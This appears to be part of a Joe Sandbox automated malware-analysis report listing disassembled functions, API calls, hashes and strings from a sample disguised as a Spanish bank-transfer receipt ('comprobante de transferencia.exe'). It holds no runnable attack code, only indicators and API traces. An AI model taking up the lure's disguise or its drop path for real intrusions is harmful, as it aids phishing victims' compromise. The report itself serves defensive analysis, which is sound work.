Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
Instruction ID: 8b162ba546b3877e829776e4b8c3d619a2c74ac71086561365c339888b8acfb9
Opcode Fuzzy Hash: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
Instruction Fuzzy Hash: 61E04F30800204BBDF01AFA4CE49DBD3B79AB00344F14043AF900AB1D5E7F89A809749

Uniqueness

Uniqueness Score: -1.00%

Function 0040412A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D

Uniqueness

Uniqueness Score: -1.00%

Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00403222 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00403230

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404100 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404AF5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B0D
GetDlgItem.USER32(?,00000408), ref: 00404B18
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
LoadBitmapW.USER32(0000006E), ref: 00404B75
SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
DeleteObject.GDI32(00000000), ref: 00404BEB
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
GetWindowLongW.USER32(?,000000F0), ref: 00404D26
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
ShowWindow.USER32(?,00000005), ref: 00404D45
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
ImageList_Destroy.COMCTL32(?), ref: 00404F15
GlobalFree.KERNEL32(?), ref: 00404F25
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
SendMessageW.USER32(?,00001102,?,?), ref: 00405047
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
InvalidateRect.USER32(?,00000000,?), ref: 00405076
ShowWindow.USER32(?,00000000), ref: 004050C4
GetDlgItem.USER32(?,000003FE), ref: 004050CF
ShowWindow.USER32(00000000), ref: 004050D6

Strings

N, xrefs: 00404D80
M, xrefs: 00404C9F
, xrefs: 004050AE

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404579 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045C8
SetWindowTextW.USER32(00000000,?), ref: 004045F2
SHBrowseForFolderW.SHELL32(?), ref: 004046A3
CoTaskMemFree.OLE32(00000000), ref: 004046AE
lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
lstrcatW.KERNEL32(?,Call), ref: 004046EC
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE

Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756

Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
Part of subcall function 004062AE: CharNextW.USER32(?,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
Part of subcall function 004062AE: CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338

GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC

Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 004046C9
|w, xrefs: 0040457F
Call, xrefs: 004046DA, 004046DF, 004046EA
A, xrefs: 0040469C
&B, xrefs: 00404676

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$|w$&B
API String ID: 2624150263-1778747185
Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004074E4,?,?,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven
API String ID: 542301482-828510313
Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040427B Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
GetDlgItem.USER32(?,000003E8), ref: 0040432D
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
GetSysColor.USER32(?), ref: 0040435B
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
lstrlenW.KERNEL32(?), ref: 0040437C
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
GetDlgItem.USER32(?,0000040A), ref: 004043F7
SendMessageW.USER32(00000000), ref: 004043FE
GetDlgItem.USER32(?,000003E8), ref: 00404429
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
SetCursor.USER32(00000000), ref: 0040447D
ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
SetCursor.USER32(00000000), ref: 004044A1
SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2

Strings

open, xrefs: 0040448A
|w, xrefs: 004043D7
Call, xrefs: 00404458
N, xrefs: 00404417

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open$|w
API String ID: 3615053054-2179926920
Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5

Uniqueness

